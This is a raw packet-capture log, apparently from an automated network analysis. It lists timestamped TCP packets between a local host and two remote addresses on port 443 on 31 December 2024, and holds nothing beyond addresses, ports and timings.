                                                                                                      Dec 31, 2024 09:25:11.319396019 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.330931902 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.330945969 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.331012011 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.331018925 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.331060886 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.331706047 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.331720114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.331775904 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.331783056 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.331820965 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.353766918 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.353782892 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.353944063 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.353979111 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.354034901 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.377460003 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.377475977 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.377599001 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.377616882 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.377696991 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.378674984 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.378690004 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.378757000 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.378765106 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.378827095 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.379515886 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.379535913 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.379596949 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.379605055 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.379661083 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.405580997 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.405596018 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.405740976 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.405756950 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.405806065 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.406301022 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.406316996 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.406388044 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.406394958 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.406443119 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.417957067 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.417973995 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.418045044 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.418055058 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.418128014 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.418729067 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.418745041 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.418816090 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.418823004 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.418865919 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.440627098 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.440643072 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.440736055 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.440743923 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.440788031 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.464378119 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.464395046 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.464514017 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.464524031 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.464567900 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.465451956 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.465468884 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.465537071 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.465544939 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.465590000 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.466224909 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.466239929 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.466303110 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.466310024 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.466351986 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.492682934 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.492697954 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.492775917 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.492786884 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.492834091 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.493311882 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.493328094 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.493381023 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.493388891 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.493438005 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.504719019 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.504734993 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.504812002 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.504821062 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.504882097 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.505536079 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.505552053 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.505620003 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.505628109 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.505681038 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.527451992 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.527468920 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.527533054 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.527544022 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.527585030 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.527615070 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.551198006 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.551213980 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.551271915 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.551289082 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.551331043 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.551362038 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.552342892 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.552362919 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.552436113 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.552444935 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.552498102 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.553045988 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.553060055 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.553142071 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.553149939 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.553195000 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.553214073 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.579498053 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.579513073 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.579581022 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.579622030 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.579715967 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.580210924 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.580226898 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.580291986 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.580300093 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.580348015 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.591578007 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.591592073 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.591662884 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.591675997 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.591737986 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.592394114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.592406034 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.592475891 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.592483997 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.592536926 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.614545107 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.614559889 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.614649057 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.614660025 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.614713907 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.638122082 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.638138056 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.638245106 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.638254881 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.638298988 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.639214039 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639230013 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639305115 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.639317036 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639364004 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.639866114 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639905930 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639936924 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.639940977 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639956951 CET44349707188.114.97.3192.168.2.5
                                                                                                      Dec 31, 2024 09:25:11.639976978 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.640008926 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:25:11.658111095 CET49707443192.168.2.5188.114.97.3
                                                                                                      Dec 31, 2024 09:26:21.167839050 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.167898893 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:21.167972088 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.169019938 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.169030905 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:21.640067101 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:21.640161037 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.642697096 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.642708063 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:21.642961025 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:21.685157061 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.685184002 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:21.685292006 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.107835054 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.107948065 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.108010054 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.110193014 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.110219002 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.110234976 CET49983443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.110240936 CET44349983188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.121387959 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.121439934 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.121530056 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.122489929 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.122500896 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.578193903 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.578263998 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.581660032 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.581670046 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.581881046 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.583235979 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.583249092 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.583296061 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.998790979 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.998872995 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.998904943 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.998923063 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.998946905 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.998984098 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.998986959 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.998996973 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.999048948 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.999052048 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.999059916 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:22.999097109 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:22.999610901 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000072002 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000118017 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.000123978 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000269890 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000313997 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.000318050 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000351906 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000401020 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.000439882 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.000451088 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.000464916 CET49984443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.000474930 CET44349984188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.087511063 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.087548018 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.087626934 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.088103056 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.088114023 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.554661036 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.554735899 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.555979967 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.555991888 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.556221008 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:23.565566063 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.565679073 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:23.565704107 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.095566988 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.095675945 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.095752954 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.095876932 CET49986443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.095900059 CET44349986188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.126388073 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.126441002 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.126934052 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.126934052 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.126976967 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.607152939 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.607228041 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.608584881 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.608593941 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.608827114 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.610044956 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.610178947 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.610208988 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:24.610285044 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:24.655337095 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.155926943 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.156053066 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.156131983 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.156220913 CET49987443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.156244993 CET44349987188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.228679895 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.228727102 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.233475924 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.233901978 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.233926058 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.693521023 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.693614006 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.705600977 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.705621004 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.705859900 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.707231998 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.707299948 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.707331896 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:25.707384109 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:25.707393885 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:26.316000938 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:26.316096067 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:26.316143036 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:26.316288948 CET49988443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:26.316314936 CET44349988188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:26.719460964 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:26.719521046 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:26.719607115 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:26.720860004 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:26.720906019 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.157744884 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.157830000 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.159204960 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.159214973 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.159449100 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.160655975 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.160775900 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.160801888 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.588947058 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.589041948 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.589107990 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.589266062 CET49989443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.589284897 CET44349989188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.602650881 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.602710009 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:28.602840900 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.603168011 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:28.603183985 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.077436924 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.077558994 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.079029083 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.079041004 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.079343081 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.080693960 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.080770969 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.080777884 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.509499073 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.509586096 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.509655952 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.509970903 CET49990443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.509995937 CET44349990188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.579446077 CET49991443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.579499960 CET44349991188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:29.579595089 CET49991443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.579890966 CET49991443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:29.579910040 CET44349991188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:30.056516886 CET44349991188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:30.056628942 CET49991443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:30.058022976 CET49991443192.168.2.5188.114.96.3
                                                                                                      Dec 31, 2024 09:26:30.058036089 CET44349991188.114.96.3192.168.2.5
                                                                                                      Dec 31, 2024 09:26:30.058303118 CET44349991188.114.96.3192.168.2.5
